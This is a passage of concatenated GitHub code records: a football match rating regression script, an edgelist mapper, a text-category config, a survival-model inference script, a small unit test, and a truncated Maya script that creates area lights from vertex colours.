\"op_data/MLS/\"\nfile = \"MLS2021.csv\"\n\nsup_estimator = pickle.load(open(folder + \"ML_models/sup_estimator_pre_lin_5.pkl\", 'rb'))\ntot_estimator = pickle.load(open(folder + \"ML_models/tot_estimator_pre_lin_5.pkl\", 'rb'))\n\nsup_list = []\ntot_list = []\nsup_value_list = []\ntot_value_list = []\nfor s in np.arange(-80, 81):\n #print(s)\n sup_temp = []\n tot_temp = []\n sup_value_temp = []\n tot_value_temp = []\n for t in np.arange(200, 501):\n sup = s / 100\n tot = t / 100\n\n\n\n value = sup_estimator.predict(np.asarray([[sup, tot, abs(sup), sup if sup > 0 else 0, -sup if sup <0 else 0]]))[0]\n value2 = tot_estimator.predict(np.asarray([[sup, tot, abs(sup), sup if sup > 0 else 0, -sup if sup <0 else 0]]))[0]\n\n sup_temp.append(value)\n tot_temp.append(value2)\n sup_value_temp.append(sup)\n tot_value_temp.append(tot)\n\n sup_list.append(sup_temp)\n tot_list.append(tot_temp)\n sup_value_list.append(sup_value_temp)\n tot_value_list.append(tot_value_temp)\n\nsup_list = np.asarray(sup_list)\ntot_list = np.asarray(tot_list)\nsup_value_list = np.asarray(sup_value_list)\ntot_value_list = np.asarray(tot_value_list)\n\nprint (\"build grids\")\n\n\ndf = pd.read_csv(folder + \"fit/\" + file)\n\ndf[\"sup_per_goal\"] = (df[\"home_underlying\"] - df[\"away_underlying\"])/(df[\"home_underlying\"] + df[\"away_underlying\"])\ndf[\"ex_total\"] = (df[\"home_underlying\"] + df[\"away_underlying\"])\n\n#need to roll x games/days\n#need to build_features\n\n#date, teama, 
teamb, scorea, scoreb, sup per goal, ex total\n\ngames_details = []\n\nfor x, row in df.iterrows():\n sup, tot = get_inverse_sup_and_tot(row[\"sup_per_goal\"], row[\"ex_total\"], sup_list, tot_list, sup_value_list, tot_value_list)\n print (row[\"sup_per_goal\"], row[\"ex_total\"], sup, tot )\n # this_row = [row[\"Date\"],\n # row[\"Time\"],\n # row[\"HomeTeam\"],\n # row[\"AwayTeam\"],\n # row[\"FTHG\"],\n # row[\"FTAG\"],\n # row[\"AHh\"],\n # row[\"AvgAHH\"],\n # row[\"AvgAHA\"],\n # row[\"Avg>2.5\"],\n # row[\"Avg<2.5\"],\n # row[\"sup_per_goal\"],\n # row[\"ex_total\"],\n # sup[0],\n # tot[0]] #row[\"home_underlying\"], row[\"away_underlying\"]]\n\n this_row =[row[\"date\"],\n \"\", # row[\"Time\"],\n row[\"home_team\"],\n row[\"away_team\"],\n row[\"home_score\"],\n row[\"away_score\"],\n row[\"sup_per_goal\"],\n row[\"ex_total\"],\n sup[0],\n tot[0]]\n\n print (this_row)\n games_details.append(this_row)\n\n#print (games_details)\n\nteam_list = []\nfor game in games_details:\n if game[2] not in team_list:\n team_list.append(game[2])\n if game[3] not in team_list:\n team_list.append(game[3])\n\n\n\ndef run_league(args, should_print=False, write_csv=False):\n\n bm = BetMaker()\n total_adjust = [0] * len(team_list)\n sup_adjust = [0] * len(team_list)\n\n csv_rows = []\n rolling_game_list = []\n rolling_game_list2 = []\n rolling_y_list = []\n rolling_y_list_2 = []\n next_fixtures_list = []\n\n start_date = None\n the_alpha = 0.001\n game_carry = 0.0125\n required_games = 50\n the_alpha = args[0]\n required_games = int(args[1])\n differences = []\n differences2 = []\n for game in games_details:\n\n # date_as_dt = datetime.strptime(game[0], \"%d/%m/%Y\")\n\n if True:#date_as_dt < datetime(2022, 3, 2):\n if game[0] != start_date and len(rolling_game_list) > required_games:\n #trigger calcs\n\n model = calculate_ridge(rolling_game_list, rolling_y_list, the_alpha)\n model2 = calculate_ridge(rolling_game_list2, rolling_y_list_2, the_alpha)\n # if should_print:\n # print (\"ha\", model.coef_[-1])\n # get_team_ranks(team_list, model.coef_)\n\n start_date = game[0]\n\n for game2 in games_details:\n if game2[0] == start_date:\n fake_row = [0] * (len(team_list)) #one for ha\n fake_row_2 = [0] * (len(team_list)) # one for ha\n home_ind = team_list.index(game2[2])\n away_ind = team_list.index(game2[3])\n fake_row[home_ind] = 1\n fake_row[away_ind] = -1\n #fake_row[-1] = 1\n\n fake_row_2[home_ind] = 1\n fake_row_2[away_ind] = 1\n # fake_row_2[-1] = -1\n\n predicted_value = model_pred(model, [fake_row])[0] + sup_adjust[home_ind] - sup_adjust[away_ind]\n predicted_value_2 = model_pred(model2, [fake_row_2])[0] + total_adjust[home_ind] + total_adjust[\n away_ind]\n actual_sup_prd = sup_estimator.predict(np.asarray([[predicted_value,\n predicted_value_2,\n abs(predicted_value),\n predicted_value if predicted_value > 0 else 0,\n -predicted_value if predicted_value < 0 else 0]]))[0]\n actual_tot_prd = \\\n tot_estimator.predict(np.asarray([[predicted_value,\n predicted_value_2,\n abs(predicted_value),\n predicted_value if predicted_value > 0 else 0,\n -predicted_value if predicted_value < 0 else 0]]))[0]\n\n\n\n\n if should_print:\n print (game2[0], \",\",\n game2[1], \",\",\n game2[2], \",\",\n game2[3], \",\",\n game2[4], \",\",\n game2[5], \",\",\n predicted_value, \",\",\n predicted_value_2, \",\",\n actual_sup_prd, \",\",\n actual_tot_prd, \",\",\n game2[-2], \",\",\n game2[-1], \",\",\n game2[-4], \",\",\n game2[-3])\n # print (model.coef_[home_ind], model.coef_[away_ind], model.intercept_)\n\n\n # sup 
update\n if game2[4] + game2[5] == 0:\n sup_adjust[home_ind] = 0\n sup_adjust[away_ind] = 0\n else:\n sup_adjust[home_ind] = ((game2[4] - game2[5]) / (game2[4] + game2[5]) - game2[\n -4]) * game_carry\n sup_adjust[away_ind] = ((-game2[4] + game2[5]) / (game2[4] + game2[5]) + game2[\n -4]) * game_carry\n\n # tot_update\n total_adjust[home_ind] = ((game2[4] + game2[5]) - game2[-3]) * game_carry\n total_adjust[away_ind] = ((game2[4] + game2[5]) - game2[-3]) * game_carry\n\n fake_row = [0] * (len(team_list)) # one for ha\n fake_row_2 = [0] * (len(team_list)) # one for ha\n home_ind = team_list.index(game[2])\n away_ind = team_list.index(game[3])\n fake_row[home_ind] = 1\n fake_row[away_ind] = -1\n\n fake_row_2[home_ind] = 1\n fake_row_2[away_ind] = 1\n\n rolling_game_list.append(fake_row)\n rolling_game_list2.append(fake_row_2)\n rolling_y_list.append(game[-2])\n rolling_y_list_2.append(game[-1])\n rolling_y_list = rolling_y_list[-(required_games + 1):]\n rolling_y_list_2 = rolling_y_list_2[-(required_games + 1):]\n rolling_game_list = rolling_game_list[-(required_games +1 ):]\n rolling_game_list2 = rolling_game_list2[-(required_games + 1):]\n\n model = calculate_ridge(rolling_game_list, rolling_y_list, the_alpha)\n model2 = calculate_ridge(rolling_game_list2, rolling_y_list_2, the_alpha)\n\n rating_dict = {}\n print (\"******************\")\n for x, team in enumerate(team_list):\n print (team, model.coef_[x] + sup_adjust[x], model2.coef_[x] + total_adjust[x])\n rating_dict[team] = {\"sup\": model.coef_[x] + sup_adjust[x],\n \"tot\": model2.coef_[x] + total_adjust[x]}\n\n print (\"sup int\", model.intercept_)\n print(\"tot int\", model2.intercept_)\n rating_dict[\"ints\"] = {\"sup\": model.intercept_,\n \"tot\": model2.intercept_}\n import json\n with open(folder + \"ratings/ratings.json\", \"w\") as outfile:\n json_object = json.dump(rating_dict, outfile)\n return None\n\n#optim = minimize(run_league, np.asarray([1, 40]), method=\"BFGS\")\n\n#print (optim)\n\nrun_league([0.0000001, 50], should_print=True, write_csv=True)\n","repo_name":"BarneyThePD/footything","sub_path":"rolling_regression_alt_5_from_oddsportal.py","file_name":"rolling_regression_alt_5_from_oddsportal.py","file_ext":"py","file_size_in_byte":11199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6584202406","text":"#!/usr/bin/env python3\nimport argparse\nimport tempfile\nimport os\nimport sys\nfrom typing import * # pylint: disable=wildcard-import,unused-wildcard-import\n\nimport shelve\n\n\ndef parse_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser(\n description=\"Map the entities and the relations of an edgelist\"\n )\n parser.add_argument(\"edgelist\", help=\"Path of the edgelist file\")\n parser.add_argument(\n \"-em\",\n \"--ent-map\",\n default=\"entities_map.tsv\",\n help=\"Output path of the mapping for entities\",\n )\n parser.add_argument(\n \"-rm\",\n \"--rel-map\",\n default=\"relations_map.tsv\",\n help=\"Output path of the mapping for relations\",\n )\n parser.add_argument(\n \"-me\",\n \"--mapped-edgelist\",\n default=\"mapped_edgelist.tsv\",\n help=\"Output path of the mapped edgelist\",\n )\n return parser.parse_args()\n\n\ndef normalize_args(args: argparse.Namespace) -> None:\n args.edgelist = os.path.realpath(args.edgelist)\n args.ent_map = os.path.realpath(args.ent_map)\n args.rel_map = os.path.realpath(args.rel_map)\n args.mapped_edgelist = os.path.realpath(args.mapped_edgelist)\n\n\ndef validate_args(args: argparse.Namespace) 
-> None:\n    if not os.path.isfile(args.edgelist):\n        print(\"The edgelist file does not exist\")\n        sys.exit(1)\n    if not os.path.isfile(args.ent_map):\n        print(\"The entities mapping file does not exist\")\n        sys.exit(1)\n    if not os.path.isfile(args.rel_map):\n        print(\"The relations mapping file does not exist\")\n        sys.exit(1)\n\n\ndef main(args: argparse.Namespace) -> None:\n    edgelist_path = args.edgelist\n    ent_map_path = args.ent_map\n    rel_map_path = args.rel_map\n    el_map_path = args.mapped_edgelist\n\n    with tempfile.TemporaryDirectory() as tmp:\n        ent_dict_path = os.path.join(tmp, \"ent\")\n        rel_dict_path = os.path.join(tmp, \"rel\")\n\n        with shelve.open(ent_dict_path) as ent_dict, shelve.open(\n            rel_dict_path\n        ) as rel_dict:\n            print(\"Processing entities mapping\")\n            with open(ent_map_path, \"r\") as em_handle:\n                for line in em_handle:\n                    parts = line.rstrip(\"\\n\").split(\"\\t\")\n                    ent_dict[parts[1]] = parts[0]\n\n            print(\"Processing relations mapping\")\n            with open(rel_map_path, \"r\") as rm_handle:\n                for line in rm_handle:\n                    parts = line.rstrip(\"\\n\").split(\"\\t\")\n                    rel_dict[parts[1]] = parts[0]\n\n            print(\"Writing the mapped edgelist\")\n            os.makedirs(os.path.dirname(el_map_path), exist_ok=True)\n            with open(el_map_path, \"w+\") as mel_handle, open(\n                edgelist_path, \"r\"\n            ) as el_handle:\n                for line in el_handle:\n                    parts = line.rstrip(\"\\n\").split(\"\\t\")\n                    mel_handle.write(\n                        ent_dict[parts[0]]\n                        + \"\\t\"\n                        + rel_dict[parts[1]]\n                        + \"\\t\"\n                        + ent_dict[parts[2]]\n                        + \"\\n\"\n                    )\n\n\nif __name__ == \"__main__\":\n    try:\n        ARGS = parse_args()\n\n        normalize_args(ARGS)\n        validate_args(ARGS)\n        main(ARGS)\n    except (KeyboardInterrupt, SystemExit):\n        print(\"\\nAborted!\")\n","repo_name":"simonepri/edgelist-mapper","sub_path":"edgelist_mapper/bin/map_edgelist.py","file_name":"map_edgelist.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"41459310054","text":"users = {\n    'niklas': [\n        'computer',\n        'sports'\n    ],\n    'luca': [\n        'computer',\n        'science'\n    ],\n    'florian': [\n        'politics',\n        'sports'\n    ]\n}\n\nthreshold = 2.0\n\ndoc_path = 'docs/'\n\nmodel_path = 'model/'\n\ncategories = [\n    'alt.atheism',\n    'comp.graphics',\n    'comp.os.ms-windows.misc',\n    'comp.sys.ibm.pc.hardware',\n    'comp.sys.mac.hardware',\n    'comp.windows.x',\n    # 'misc.forsale',\n    'rec.autos',\n    'rec.motorcycles',\n    'rec.sport.baseball',\n    'rec.sport.hockey',\n    'sci.crypt',\n    'sci.electronics',\n    'sci.med',\n    'sci.space',\n    'soc.religion.christian',\n    'talk.politics.guns',\n    'talk.politics.mideast',\n    'talk.politics.misc',\n    'talk.religion.misc'\n]\n\nnew_categories = {\n    'comp': 'computer',\n    'rec': 'sports',\n    'sci': 'science',\n    'religion': 'religion',\n    'politics': 'politics',\n    'atheism': 'religion'\n}\n","repo_name":"covix/vector-space-model","sub_path":"Assignment01/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18449456154","text":"import copy\nimport json\nimport pandas as pd\nimport sys\nimport torch\nimport pytorch_lightning as pl\nimport numpy as np\n\nfrom pathlib import Path\nfrom torch.utils.data import DataLoader\n\nfrom argparse import ArgumentParser\n\nfrom survival_plus_x.data.dataset import GensheimerDatasetInMemory\nfrom survival_plus_x.data.transforms import get_preprocess_transforms\nfrom survival_plus_x.models.survival_plus_unetr import 
MultitaskPlusUNETR\nfrom survival_plus_x.models.survival_plus_unet import MultitaskPlusUNET\nfrom survival_plus_x.models.multitask import multitask_metrics_from_step_outputs\nfrom survival_plus_x.utils.commandline_params import add_common_args\nfrom survival_plus_x.models.cox_lightning import compute_stratification_logrank_pvalue\n\n\ndef inference_single_sample(args, test_ids, model):\n test_dataset = GensheimerDatasetInMemory(\n image_directories=args.input,\n image_filename=args.img_filename,\n mask_filename=args.mask_filename,\n patient_ids=test_ids,\n outcome_file=args.outcome,\n outcome_file_sep=args.outcome_sep,\n outcome_file_id_column=args.id_col,\n outcome_file_time_column=args.time_col,\n outcome_file_event_column=args.event_col,\n interval_breaks=model.hparams.gensheimer_interval_breaks,\n preprocess_transform=get_preprocess_transforms(list(args.image_size)),\n augmentation_transform=None)\n\n test_loader = DataLoader(\n test_dataset,\n shuffle=False,\n batch_size=args.batch_size,\n num_workers=args.num_workers)\n\n trainer = pl.Trainer(gpus=args.gpus)\n\n test_pred_step_outputs = trainer.predict(\n model,\n dataloaders=test_loader)\n\n return test_pred_step_outputs\n\n\ndef inference_multiple_samples(args, test_ids, model):\n # we have to set up the dataset in the way that initially a larger\n # crop is chosen and then a transform that creates random crops of the\n # actually wanted size\n from monai.transforms import RandSpatialCropSamplesd, Resized, Compose\n\n n_samples = args.n_samples\n aggregation_fn = {\n \"min\": torch.min,\n \"max\": torch.max,\n \"mean\": torch.mean,\n \"median\": torch.median\n }[args.sample_aggregation]\n\n random_crops_transform = Compose([\n RandSpatialCropSamplesd(\n keys=[\"img\", \"mask\"],\n roi_size=args.image_size,\n random_size=False,\n random_center=True,\n num_samples=n_samples\n ),\n Resized(\n keys=[\"img\", \"mask\"],\n spatial_size=args.image_size)\n ])\n\n test_dataset = GensheimerDatasetInMemory(\n image_directories=args.input,\n image_filename=args.img_filename,\n mask_filename=args.mask_filename,\n patient_ids=test_ids,\n outcome_file=args.outcome,\n outcome_file_sep=args.outcome_sep,\n outcome_file_id_column=args.id_col,\n outcome_file_time_column=args.time_col,\n outcome_file_event_column=args.event_col,\n interval_breaks=model.hparams.gensheimer_interval_breaks,\n preprocess_transform=get_preprocess_transforms(\n (1.25 * np.array(args.image_size)).astype(int).tolist()), # increase spatial size so we can random crop\n augmentation_transform=random_crops_transform)\n\n test_loader = DataLoader(\n test_dataset,\n shuffle=False,\n batch_size=args.batch_size,\n num_workers=args.num_workers)\n\n # now each batch the data loader produces is a list of dicts of length n_samples\n # for which we have to make predictions and boil down results to a single dict\n # per batch\n\n step_outputs = []\n\n surv_heads = model.hparams.heads_to_use\n print(\"models survival heads\", surv_heads)\n with torch.no_grad():\n for batch_idx, batch in enumerate(test_loader):\n # batch is now a list of dicts, one dict for each sample\n # and we have to aggregate over all samples to make a final\n # prediction for each patient in the batch\n aggregated_step_result = {}\n for sample_idx, sample_dict in enumerate(batch):\n print(\n f\"\\nPredicting for Batch {batch_idx+1}, sample {sample_idx + 1}\\n\")\n\n # results for the first sample of the batch patients\n # has keys 'survival' and 'segmentation' where\n # survival is another dict for each head containing 
the keys 'patient', 'label' and 'prediction'\n sample_result = model.predict_step(\n sample_dict, batch_idx=None) # batch_idx is not used anyway\n # print(sample_result.keys())\n # print(\"sample_result['survival'].keys()\",\n # sample_result[\"survival\"].keys())\n\n if sample_idx == 0:\n for head in surv_heads: # sample_result[\"survival\"]:\n aggregated_step_result[head] = dict()\n # copy all non-prediction keys\n for k in sample_result[\"survival\"][head].keys():\n if \"prediction\" in k:\n continue\n aggregated_step_result[head][k] = sample_result[\"survival\"][head][k]\n\n aggregated_step_result[head][\"sample_predictions\"] = [\n sample_result[\"survival\"][head][\"prediction\"].detach()]\n\n else:\n for head in surv_heads: # sample_result[\"survival\"]:\n aggregated_step_result[head][\"sample_predictions\"].append(\n sample_result[\"survival\"][head][\"prediction\"].detach())\n\n # stack all the predictions we aggregated along the second dimension,\n # so the output has shape B, n_samples, n_predictions for each head\n for head in surv_heads:\n aggregated_step_result[head][\"sample_predictions\"] = torch.stack(\n aggregated_step_result[head][\"sample_predictions\"], dim=1)\n\n # now final aggregation\n for head in surv_heads:\n aggregated = aggregation_fn(\n aggregated_step_result[head][\"sample_predictions\"], dim=1)\n\n # NOTE: for min, max and median, torch calls return a tuple of\n # values and indices if dim= argument is passed (but not for mean)\n if not isinstance(aggregated, torch.Tensor):\n assert len(aggregated) == 2\n vals, _ = aggregated\n aggregated = vals\n aggregated_step_result[head][\"sample_predictions_std\"] = torch.std(\n aggregated_step_result[head][\"sample_predictions\"],\n dim=1,\n unbiased=False\n )\n\n aggregated_step_result[head][\"prediction\"] = aggregated\n\n step_outputs.append(dict(survival=aggregated_step_result))\n\n return step_outputs\n\n\ndef main(args):\n pl.seed_everything(args.seed)\n test_ids = pd.read_csv(args.test_id_file,\n header=None).values.squeeze().tolist()\n\n if args.vit_or_cnn == \"vit\":\n cls = MultitaskPlusUNETR\n\n elif args.vit_or_cnn == \"cnn\":\n cls = MultitaskPlusUNET\n\n model = cls.load_from_checkpoint(\n checkpoint_path=args.ckpt_file)\n model.eval()\n model.freeze()\n print(f\"Loaded trained model from checkpoint {args.ckpt_file}.\")\n\n if args.n_samples > 1:\n test_pred_step_outputs = inference_multiple_samples(\n args, test_ids, model)\n elif args.n_samples == 1:\n test_pred_step_outputs = inference_single_sample(\n args, test_ids, model)\n else:\n raise ValueError(\n f\"n_samples must be >= 1, not \"\n f\"{args.n_samples}\")\n\n # NOTE: information of variance among multiple predictions gets lost here\n # since only the \"prediction\" keys are taken into account when evaluating\n # metrics and returning test_pred\n # TODO: maybe write out the step_outputs in some meaningful way as well?\n\n test_metrics, test_pred = multitask_metrics_from_step_outputs(\n [d[\"survival\"] for d in test_pred_step_outputs],\n task_names=model.hparams.heads_to_use,\n timepoints_cindex=model.hparams.timepoints_cindex,\n timepoints_brier=model.hparams.timepoints_brier,\n training_labels=model.hparams.training_labels,\n gensheimer_interval_breaks=model.hparams.gensheimer_interval_breaks\n )\n\n # if inference_multiple_samples -> also add the standard deviations for the predictions\n # to the test_pred dataframe\n if args.n_samples > 1:\n for head in test_pred:\n stds = torch.cat([d['survival'][head]['sample_predictions_std']\n for d in 
test_pred_step_outputs])\n #pats = [d['survival'][head]['patient']]\n stds_dict = {}\n for i in range(stds.shape[1]):\n stds_dict[f'std_prediction_{i}'] = stds[:, i]\n stds_dict = pd.DataFrame(stds_dict)\n test_pred[head] = pd.concat([test_pred[head], stds_dict], axis=1)\n\n print()\n print(f\"Storing test predictions to {args.output_dir}\")\n for head in test_pred:\n pred_df = test_pred[head]\n pred_df.set_index(\"patient\").to_csv(\n args.output_dir / f\"{head}_predictions.csv\")\n\n for head in test_metrics:\n metrics = pd.DataFrame(test_metrics[head], index=[0])\n\n # stratification cutoff for cox model only\n # TODO: can we use stratification cutoff for other losses?\n if head == \"cox\":\n if args.stratification_cutoff_cox is None:\n print(\"Note: No stratification cutoff was provided. Will \"\n \"determine it as median of predictions. This might \"\n \"not be intended for data other than the training \"\n \"data! If you are not using the training data now \"\n \"you should determine the cutoff from that beforehand!\")\n stratification_cutoff = np.median(\n test_pred[head]['prediction'])\n else:\n stratification_cutoff = args.stratification_cutoff_cox\n\n test_logrank_pval = compute_stratification_logrank_pvalue(\n test_pred[head], cutoff=stratification_cutoff)\n\n metrics['stratification_cutoff'] = stratification_cutoff\n metrics['stratification_logrank_pval'] = test_logrank_pval\n\n print()\n print(f\"{head.capitalize()} metrics (storing to {args.output_dir})\")\n print(metrics)\n metrics.to_csv(args.output_dir / f\"{head}_metrics.csv\", index=False)\n\n return 0\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\"Inference\")\n parser = add_common_args(parser)\n parser.add_argument(\n '--ckpt_file',\n type=str,\n help='Full path to a checkpoint file of the trained model.')\n parser.add_argument(\n '--output_dir',\n type=str,\n default=None)\n parser.add_argument(\n '--gpus',\n type=int,\n default=0)\n parser.add_argument(\n '--stratification_cutoff_cox',\n type=float,\n help=\"Cutoff value applied to the test predictions to divide into low and high risk groups.\")\n parser.add_argument(\n '--n_samples',\n type=int,\n default=1,\n help=\"Number of random crops to create per patient and from which to make a final prediction\"\n )\n parser.add_argument(\n '--sample_aggregation',\n type=str,\n choices=[\"mean\", \"median\", \"min\", \"max\"],\n default=\"mean\"\n )\n parser.add_argument(\n \"--vit_or_cnn\",\n type=str,\n choices=[\"vit\", \"cnn\"],\n #default=\"vit\"\n )\n\n # parser.add_argument('--plot_predictions',\n # action=\"store_true\",\n # default=False,\n # help=\"Flag to decide whether predictions for each\"\n # \" patient should be plotted after training.\")\n\n args = parser.parse_args()\n print(f\"parsed args are\\n{args}\")\n\n if args.output_dir is None:\n args.output_dir = \"./cox_vit/inference\"\n if not isinstance(args.output_dir, Path):\n args.output_dir = Path(args.output_dir)\n\n if not args.output_dir.is_dir():\n args.output_dir.mkdir(parents=True)\n else:\n raise ValueError(f\"Output_dir {args.output_dir} already exists!\")\n\n # storing the commandline arguments to a json file\n with open(args.output_dir / \"commandline_args.json\", 'w') as of:\n # pathlib objects cant be serialized so we convert to string\n storage_args = vars(copy.deepcopy(args))\n storage_args[\"output_dir\"] = str(\n storage_args[\"output_dir\"])\n\n json.dump(storage_args, of, indent=2)\n\n args.input = [Path(inp) for inp in args.input]\n\n retval = main(args)\n 
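# exit with main's return code so shell callers can detect failure\n    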
sys.exit(retval)\n","repo_name":"oncoray/multitask-hnscc","sub_path":"scripts/multitask/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":13005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"72783039019","text":"from unittest.mock import Mock\n\nfrom _sadm.devops.wapp.view import index\n\ndef test_handle(devops_wapp):\n\twapp = devops_wapp()\n\twith wapp.mock() as ctx:\n\t\tbup = Mock()\n\t\tbup._repos = index._repos\n\t\ttry:\n\t\t\trepos = object()\n\t\t\tindex._repos = Mock(return_value = repos)\n\t\t\tindex.handle(user = None)\n\t\tfinally:\n\t\t\tdel index._repos\n\t\t\tindex._repos = bup._repos\n\t\tctx.tpl.parse.assert_called_with('index', repos = repos, user = None)\n","repo_name":"jrmsdev/pysadm","sub_path":"t/devops/devops_wapp_view_index_test.py","file_name":"devops_wapp_view_index_test.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41234490612","text":"import maya.cmds as cmds\n\nvertexlist = cmds.ls(sl=True, fl=True)\nmesh = vertexlist[0].split('.')[0]\ncmds.select(mesh)\nmeshShape = cmds.listRelatives(shapes=True)[0]\norig = cmds.duplicate(mesh, name=mesh + 'Orig')\ntodelete = cmds.ls(sl=True)\ncpv = cmds.rename(meshShape, mesh + 'CPVShape')\ntomove = cmds.listRelatives(shapes=True)[0]\ncmds.parent(tomove, mesh, shape=True, relative=True)\ncmds.delete(todelete)\norig = orig[0] + 'Shape'\n\n# create input graph\n\ncmds.select(orig)\natpc = soup().create('arrayToPointColor')[0]\ncmds.connectAttr(atpc + '.outGeometry', cpv + '.inMesh', force=True)\ncmds.setAttr(atpc + '.solidAlpha', 1)\ncmds.select(orig)\ntta = soup().create('textureToArray')[0]\ncmds.connectAttr(tta + '.outRgbaPP', atpc + '.inRgbaPP')\ncmds.setAttr(tta + '.accurateSampling', 1)\ntex = cmds.shadingNode('surfaceShader', asTexture=True, name=mesh + 'CPVcolor')\ncmds.connectAttr(tex + '.outColor', tta + '.inColor')\ncmds.setAttr(orig + '.intermediateObject', 1)\ncmds.setAttr(cpv + '.displayColors', 1)\n\n# create output graph\n\ncmds.select(mesh)\nsoup().create('pointAttributeToArray')\narray = cmds.ls(sl=True)[0]\nsoup().create('rgbaToColorAndAlpha')\nrgba = cmds.ls(sl=True)[0]\nsoup().create('pointCloudToMesh')\nbakemesh = cmds.ls(sl=True)[0]\ncmds.polyCube(name=mesh + 'colorBake')\ncolorBake = cmds.ls(sl=True)[0]\n\n# set nodes attributes\ncmds.setAttr(array + '.pointColor', 1)\ncmds.setAttr(bakemesh + '.normal', 0)\ncmds.setAttr(bakemesh + '.rgba', 0)\ncmds.setAttr(bakemesh + '.map', 0)\ncmds.setAttr(bakemesh + '.position', 1)\ncmds.setAttr(colorBake + '.visibility', 0)\n\n# connect nodes\ncmds.connectAttr(array + '.outRgbaPP', rgba + '.inRgbaPP', force=True)\ncmds.connectAttr(rgba + '.outRgbPP', bakemesh + '.inPositionPP', force=True)\ncmds.connectAttr(bakemesh + '.outMesh', colorBake + '.inMesh', force=True)\n\n# 1 locator per color\n\nvertexNo = [x.replace(x.split('.')[0], colorBake) for x in vertexlist]\ncmds.select(vertexNo)\nvertexConstraint_SOuP().main()\n\n# 1 locator per light\n\ncmds.select(vertexlist)\nvertexConstraint_SOuP().main()\nlocs = cmds.ls(sl=True, fl=True)\n\n# Controler\n\nctrl = cmds.spaceLocator(name=mesh + '_Light_CTRL')[0]\ncmds.move(0, 5, 0)\ncmds.addAttr(longName='lightsDisplay', attributeType='bool', defaultValue=True, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='lightsScale', attributeType='float', defaultValue=1, hidden=False, writable=True, 
keyable=True)\ncmds.addAttr(longName='targetsDisplay', attributeType='bool', defaultValue=True, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='targetsScale', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='locatorsDisplay', attributeType='bool', defaultValue=False, hidden=False, writable=True,keyable=True)\n# cmds.addAttr(longName='IESfile', dataType=\"string\", hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='NormalOffset', attributeType='float', hidden=False, writable=True, keyable=True)\n\ncmds.addAttr(longName='Intensity', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='Exposure', attributeType='float', defaultValue=12, hidden=False, writable=True, keyable=True)\n\ncmds.addAttr(longName='Spread', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\n\ncmds.addAttr(longName='DiffuseContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='SpecularContribution', min=0,max=1, attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='SSSContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='IndirectContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='VolumeContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\n\ncmds.addAttr(longName='EmitDiffuse', attributeType='bool', defaultValue=True, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='EmitSpec', attributeType='bool', defaultValue=True, hidden=False, writable=True, keyable=True)\n# cmds.setAttr(ctrl+'.IESfile',\"IES profile here...\",type=\"string\")\n\nfor vtx in locs:\n id = vtx.split('_')[3]\n lightShape = cmds.createNode('aiAreaLight', name='AreaLight_' + id)\n light = cmds.listRelatives(lightShape, parent=True)[0]\n cmds.addAttr(light, longName='cpvColor', attributeType='float3')\n cmds.addAttr(light, longName='cpvColorX', attributeType='float', parent='cpvColor')\n cmds.addAttr(light, longName='cpvColorY', attributeType='float', parent='cpvColor')\n cmds.addAttr(light, longName='cpvColorZ', attributeType='float', parent='cpvColor')\n cmds.connectAttr('vertexConstraint*_' + colorBake + '_vtx_' + id + '.translateX', light + '.cpvColorX')\n cmds.connectAttr('vertexConstraint*_' + colorBake + '_vtx_' + id + '.translateY', light + '.cpvColorY')\n cmds.connectAttr('vertexConstraint*_' + colorBake + '_vtx_' + id + '.translateZ', light + '.cpvColorZ')\n cmds.connectAttr(ctrl + '.locatorsDisplay', 'vertexConstraint*_' + mesh + '_vtx_Shape' + id + '.lodVisibility')\n cmds.connectAttr(ctrl + '.lightsDisplay', light + '.lodVisibility')\n #cmds.connectAttr(ctrl + '.IESfile', lightShape + '.aiFilename')\n cmds.connectAttr(ctrl + '.NormalOffset', light + '.translateX')\n cmds.connectAttr(ctrl + '.lightsScale', light + '.scaleX')\n cmds.connectAttr(ctrl + '.lightsScale', light + '.scaleY')\n cmds.connectAttr(ctrl + '.lightsScale', light + '.scaleZ')\n cmds.connectAttr(ctrl + '.Exposure', lightShape + '.aiExposure')\n cmds.connectAttr(ctrl + '.EmitDiffuse', lightShape + '.emitDiffuse')\n cmds.connectAttr(ctrl + '.EmitSpec', lightShape + '.emitSpecular')\n\n cmds.connectAttr(ctrl + '.Intensity', lightShape + '.intensity')\n 
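# wire the controller's remaining Arnold light attributes through to this light\n    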
